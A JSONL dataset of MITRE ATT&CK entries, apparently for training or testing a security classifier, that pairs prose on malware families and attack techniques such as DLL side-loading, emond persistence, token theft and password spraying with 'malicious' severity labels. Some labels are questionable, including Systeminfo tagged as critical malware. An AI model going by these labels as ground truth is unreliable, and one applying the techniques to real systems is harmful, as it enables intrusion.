{"id": "mitre_00466", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SUGARDUMP\n\nType: malware\nPlatforms: Windows\n\n[SUGARDUMP](https://attack.mitre.org/software/S1042) is a proprietary browser credential harvesting tool that was used by UNC3890 during the [C0010](https://attack.mitre.org/campaigns/C0010) campaign. The first known [SUGARDUMP](https://attack.mitre.org/software/S1042) version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.(Citation: Mandiant UNC3890 Aug 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SUGARDUMP", "malware_type": "malware"}}]}
{"id": "mitre_00467", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HiddenWasp\n\nType: malware\nPlatforms: Linux\n\n[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "HiddenWasp", "malware_type": "malware"}}]}
{"id": "mitre_00468", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# RIPTIDE\n\nType: malware\nPlatforms: Windows\n\n[RIPTIDE](https://attack.mitre.org/software/S0003) is a proxy-aware backdoor used by [APT12](https://attack.mitre.org/groups/G0005). (Citation: Moran 2014)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "RIPTIDE", "malware_type": "malware"}}]}
{"id": "mitre_00469", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Systeminfo\n\nType: tool\n\n[Systeminfo](https://attack.mitre.org/software/S0096) is a Windows utility that can be used to gather detailed information about a computer. (Citation: TechNet Systeminfo)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Systeminfo", "malware_type": "tool"}}]}
{"id": "mitre_00470", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SombRAT\n\nType: malware\nPlatforms: Windows\n\n[SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been used since at least 2019 to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "SombRAT", "malware_type": "malware"}}]}
{"id": "mitre_00471", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Create Account\n\nTechnique: T1136\nTactics: persistence\nPlatforms: Windows, IaaS, Linux, macOS, Network Devices, Containers, SaaS, Office Suite, Identity Provider, ESXi\n\nAdversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\n\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1136", "technique_name": "Create Account", "tactics": ["persistence"]}}]}
{"id": "mitre_00472", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Winnti for Linux\n\nType: malware\nPlatforms: Linux\n\n[Winnti for Linux](https://attack.mitre.org/software/S0430) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://attack.mitre.org/groups/G0044). The Windows variant is tracked separately under [Winnti for Windows](https://attack.mitre.org/software/S0141).(Citation: Chronicle Winnti for Linux May 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Winnti for Linux", "malware_type": "malware"}}]}
{"id": "mitre_00473", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Remote Access Tools\n\nTechnique: T1219\nTactics: command-and-control\nPlatforms: Linux, macOS, Windows\n\nAn adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. Remote access tools create a session between two trusted hosts through a graphical interface, a command line interaction, a protocol tunnel via development or management software, or hardware-level access such as KVM (Keyboard, Video, Mouse) over IP solutions. Desktop support software (usually graphical interface) and remote management software (typically command line interface) allow a user to control a computer remotely as if they are a local user inheriting the user or software permissions. This software is commonly used for troubleshooting, software installation, and system management.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.\n\nRemote access tools may be installed and used post-compromise as an alternate communications channel for redundant access or to establish an interactive remote desktop session with the target system. It may also be used as a malware component to establish a reverse connection or back-connect to a service or adversary-controlled system.\n\nInstallation of many remote access tools may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome\u2019s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1219", "technique_name": "Remote Access Tools", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00474", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Emond\n\nTechnique: T1546.014\nTactics: privilege-escalation, persistence\nPlatforms: macOS\n\nAdversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.\n\nThe rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)\n\nAdversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1546.014", "technique_name": "Emond", "tactics": ["privilege-escalation", "persistence"]}}]}
{"id": "mitre_00475", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Time Based Checks\n\nTechnique: T1497.003\nTactics: defense-evasion, discovery\nPlatforms: Linux, macOS, Windows\n\nAdversaries may employ various time-based methods to detect virtualization and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. This may include enumerating time-based properties, such as uptime or the system clock. \n\nAdversaries may use calls like `GetTickCount` and `GetSystemTimeAsFileTime` to discover if they are operating within a virtual machine or sandbox, or may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1497.003", "technique_name": "Time Based Checks", "tactics": ["defense-evasion", "discovery"]}}]}
{"id": "mitre_00476", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Access Token Manipulation\n\nTechnique: T1134\nTactics: defense-evasion, privilege-escalation\nPlatforms: Windows\n\nAdversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)\n\nAny standard user can use the runas command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1134", "technique_name": "Access Token Manipulation", "tactics": ["defense-evasion", "privilege-escalation"]}}]}
{"id": "mitre_00477", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Dacls\n\nType: malware\nPlatforms: macOS, Linux, Windows\n\n[Dacls](https://attack.mitre.org/software/S0497) is a multi-platform remote access tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least December 2019.(Citation: TrendMicro macOS Dacls May 2020)(Citation: SentinelOne Lazarus macOS July 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Dacls", "malware_type": "malware"}}]}
{"id": "mitre_00478", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# OSInfo\n\nType: malware\nPlatforms: Windows\n\n[OSInfo](https://attack.mitre.org/software/S0165) is a custom tool used by [APT3](https://attack.mitre.org/groups/G0022) to do internal discovery on a victim's computer and network. (Citation: Symantec Buckeye)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "OSInfo", "malware_type": "malware"}}]}
{"id": "mitre_00479", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# CrackMapExec\n\nType: tool\nPlatforms: Windows\n\n[CrackMapExec](https://attack.mitre.org/software/S0488), or CME, is a post-exploitation tool developed in Python and designed for penetration testing against networks. [CrackMapExec](https://attack.mitre.org/software/S0488) collects Active Directory information to conduct lateral movement through targeted networks.(Citation: CME Github September 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "CrackMapExec", "malware_type": "tool"}}]}
{"id": "mitre_00480", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# HyperStack\n\nType: malware\nPlatforms: Windows\n\n[HyperStack](https://attack.mitre.org/software/S0537) is a RPC-based backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2018. [HyperStack](https://attack.mitre.org/software/S0537) has similarities to other backdoors used by [Turla](https://attack.mitre.org/groups/G0010) including [Carbon](https://attack.mitre.org/software/S0335).(Citation: Accenture HyperStack October 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "HyperStack", "malware_type": "malware"}}]}
{"id": "mitre_00481", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Calisto\n\nType: malware\nPlatforms: macOS\n\n[Calisto](https://attack.mitre.org/software/S0274) is a macOS Trojan that opens a backdoor on the compromised machine. [Calisto](https://attack.mitre.org/software/S0274) is believed to have first been developed in 2016. (Citation: Securelist Calisto July 2018) (Citation: Symantec Calisto July 2018)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Calisto", "malware_type": "malware"}}]}
{"id": "mitre_00482", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# VPNFilter\n\nType: malware\nPlatforms: Network Devices, Linux\n\n[VPNFilter](https://attack.mitre.org/software/S1010) is a multi-stage, modular platform with versatile capabilities to support both intelligence-collection and destructive cyber attack operations. [VPNFilter](https://attack.mitre.org/software/S1010) modules such as its packet sniffer ('ps') can collect traffic that passes through an infected device, allowing the theft of website credentials and monitoring of Modbus SCADA protocols. (Citation: William Largent June 2018) (Citation: Carl Hurd March 2019) [VPNFilter](https://attack.mitre.org/software/S1010) was assessed to be replaced by [Sandworm Team](https://attack.mitre.org/groups/G0034) with [Cyclops Blink](https://attack.mitre.org/software/S0687) starting in 2019.(Citation: NCSC CISA Cyclops Blink Advisory February 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "VPNFilter", "malware_type": "malware"}}]}
{"id": "mitre_00483", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# CHIMNEYSWEEP\n\nType: malware\nPlatforms: Windows\n\n[CHIMNEYSWEEP](https://attack.mitre.org/software/S1149) is a backdoor malware that was deployed during [HomeLand Justice](https://attack.mitre.org/campaigns/C0038) along with [ROADSWEEP](https://attack.mitre.org/software/S1150) ransomware, and has been used to target Farsi and Arabic speakers since at least 2012.(Citation: Mandiant ROADSWEEP August 2022)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "CHIMNEYSWEEP", "malware_type": "malware"}}]}
{"id": "mitre_00484", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Code Signing Certificates\n\nTechnique: T1588.003\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1588.003", "technique_name": "Code Signing Certificates", "tactics": ["resource-development"]}}]}
{"id": "mitre_00485", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# OutSteel\n\nType: malware\nPlatforms: Windows\n\n[OutSteel](https://attack.mitre.org/software/S1017) is a file uploader and document stealer developed with the scripting language AutoIT that has been used by [Saint Bear](https://attack.mitre.org/groups/G1031) since at least March 2021.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "OutSteel", "malware_type": "malware"}}]}
{"id": "mitre_00486", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Hidden Window\n\nTechnique: T1143\nTactics: defense-evasion\nPlatforms: macOS, Windows\n\nAdversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.\n\n### Windows\nThere are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), Jscript, and VBScript to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)\n\n### Mac\nThe configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be\u00a0apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)\n", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1143", "technique_name": "Hidden Window", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00487", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Bankshot\n\nType: malware\nPlatforms: Windows\n\n[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Bankshot", "malware_type": "malware"}}]}
{"id": "mitre_00488", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# PAKLOG\n\nType: malware\nPlatforms: Windows\n\n[PAKLOG](https://attack.mitre.org/software/S1233) is a keylogger known to be leveraged by [Mustang Panda](https://attack.mitre.org/groups/G0129) and was first observed utilized in 2024. [PAKLOG](https://attack.mitre.org/software/S1233) is deployed via a RAR archive (e.g., key.rar), which contains two files: a signed, legitimate binary (PACLOUD.exe) and the malicious [PAKLOG](https://attack.mitre.org/software/S1233) DLL (pa_lang2.dll). The PACLOUD.exe binary is used to side-load the [PAKLOG](https://attack.mitre.org/software/S1233) DLL which starts with the keylogger functionality.(Citation: Zscaler PAKLOG CorkLog SplatCloak Splatdropper April 2025)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "PAKLOG", "malware_type": "malware"}}]}
{"id": "mitre_00489", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ShimRatReporter\n\nType: tool\nPlatforms: Windows\n\n[ShimRatReporter](https://attack.mitre.org/software/S0445) is a tool used by suspected Chinese adversary [Mofang](https://attack.mitre.org/groups/G0103) to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as [ShimRat](https://attack.mitre.org/software/S0444)) as well as set up faux infrastructure which mimics the adversary's targets. [ShimRatReporter](https://attack.mitre.org/software/S0445) has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.(Citation: FOX-IT May 2016 Mofang)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ShimRatReporter", "malware_type": "tool"}}]}
{"id": "mitre_00490", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Container Administration Command\n\nTechnique: T1609\nTactics: execution\nPlatforms: Containers\n\nAdversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)\n\nIn Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container.(Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec.(Citation: Kubectl Exec Get Shell)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1609", "technique_name": "Container Administration Command", "tactics": ["execution"]}}]}
{"id": "mitre_00491", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Component Object Model and Distributed COM\n\nTechnique: T1175\nTactics: lateral-movement, execution\nPlatforms: Windows\n\n**This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).**\n\nAdversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement. \n\nCOM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)\n\nPermissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.\n\nAdversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exists to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)\n\nAdversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1173) (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1175", "technique_name": "Component Object Model and Distributed COM", "tactics": ["lateral-movement", "execution"]}}]}
{"id": "mitre_00492", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Search Threat Vendor Data\n\nTechnique: T1681\nTactics: reconnaissance\nPlatforms: PRE\n\nThreat actors may seek information/indicators from closed or open threat intelligence sources gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. These reports may include descriptions of behavior, detailed breakdowns of attacks, atomic indicators such as malware hashes or IP addresses, timelines of a group\u2019s activity, and more. Adversaries may change their behavior when planning their future operations. \n\nAdversaries have been observed replacing atomic indicators mentioned in blog posts in under a week.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023) Adversaries have also been seen searching for their own domain names in threat vendor data and then taking them down, likely to avoid seizure or further investigation.(Citation: Sentinel One Contagious Interview ClickFix September 2025)\n\nThis technique is distinct from [Threat Intel Vendors](https://attack.mitre.org/techniques/T1597/001) in that it describes threat actors performing reconnaissance on their own activity, not in search of victim information. ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1681", "technique_name": "Search Threat Vendor Data", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00493", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# DLL Side-Loading\n\nTechnique: T1574.002\nTactics: persistence, privilege-escalation, defense-evasion\nPlatforms: Windows\n\nAdversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).\n\nSide-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1574.002", "technique_name": "DLL Side-Loading", "tactics": ["persistence", "privilege-escalation", "defense-evasion"]}}]}
{"id": "mitre_00494", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Kernel Modules and Extensions\n\nTechnique: T1547.006\nTactics: persistence, privilege-escalation\nPlatforms: macOS, Linux\n\nAdversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)\u00a0\n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide)\u00a0Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)\n\nSince macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as \"Legacy System Extensions\" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)\n\nAdversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1547.006", "technique_name": "Kernel Modules and Extensions", "tactics": ["persistence", "privilege-escalation"]}}]}
{"id": "mitre_00495", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Exfiltration Over Symmetric Encrypted Non-C2 Protocol\n\nTechnique: T1048.001\nTactics: exfiltration\nPlatforms: Linux, macOS, Windows, ESXi\n\nAdversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nSymmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. \n\nNetwork protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1048.001", "technique_name": "Exfiltration Over Symmetric Encrypted Non-C2 Protocol", "tactics": ["exfiltration"]}}]}
{"id": "mitre_00496", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# GeminiDuke\n\nType: malware\nPlatforms: Windows\n\n[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "GeminiDuke", "malware_type": "malware"}}]}
{"id": "mitre_00497", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Password Spraying\n\nTechnique: T1110.003\nTactics: credential-access\nPlatforms: Containers, ESXi, IaaS, Identity Provider, Linux, Network Devices, Office Suite, SaaS, Windows, macOS\n\nAdversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)\n\nIn order to avoid detection thresholds, adversaries may deliberately throttle password spraying attempts to avoid triggering security alerting. Additionally, adversaries may leverage LDAP and Kerberos authentication attempts, which are less likely to trigger high-visibility events such as Windows \"logon failure\" event ID 4625 that is commonly triggered by failed SMB connection attempts.(Citation: Microsoft Storm-0940) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1110.003", "technique_name": "Password Spraying", "tactics": ["credential-access"]}}]}
